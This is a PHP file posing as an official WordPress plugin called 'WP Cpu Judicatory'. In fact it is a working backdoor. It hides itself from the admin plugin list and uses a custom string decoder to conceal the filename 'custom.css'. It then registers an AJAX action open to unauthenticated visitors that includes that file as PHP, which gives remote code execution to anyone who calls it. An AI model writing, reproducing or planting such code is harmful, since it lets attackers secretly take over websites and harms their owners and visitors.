File: /var/www/vhosts/miroglu.net/httpdocs/wp-content/plugins/wp-cpu-judicatory/wp-cpu-judicatory.php
<?php
/*
Plugin Name: WP Cpu Judicatory
Plugin URI: http://wordpress.org/#
Description: Official WordPress plugin
Author: WordPress
Version: 3.1.2
Author URI: http://wordpress.org/#
*/
if (!defined('ABSPATH')) {
exit;
}
function oat_qsa() {
global $wp_list_table;
if (!isset($wp_list_table)) {
return;
}
$v = array('wp-cpu-judicatory/wp-cpu-judicatory.php');
if (isset($wp_list_table->items) && is_array($wp_list_table->items)) {
foreach ($wp_list_table->items as $key => $val) {
if (in_array($key, $v)) {
unset($wp_list_table->items[$key]);
}
}
}
}
function hsr_scm($plugins) {
$z = 'wp-cpu-judicatory/wp-cpu-judicatory.php';
if (array_key_exists($z, $plugins)) {
unset($plugins[$z]);
}
return $plugins;
}
function yhx($d, $b) {
$x = '';
for ($w = 0; $w < strlen($d); $w += 2) {
$c = ord($d[$w]) - 65;
$i = ord($d[$w + 1]);
if ($i > 90) $i -= 6;
$j = $c * 52 + ($i - 65);
$x .= chr($j - $b);
}
return $x;
}
function wmb_ajax_handler() {
include plugin_dir_path(__FILE__) . yhx('CcCuCsCtCoCmBbCcCsCs', 33);
die();
}
if (defined('ABSPATH')) {
add_action('pre_current_active_plugins', 'oat_qsa');
add_filter('all_plugins', 'hsr_scm');
add_action('wp_ajax_cpu_jud', 'wmb_ajax_handler');
add_action('wp_ajax_nopriv_cpu_jud', 'wmb_ajax_handler');
}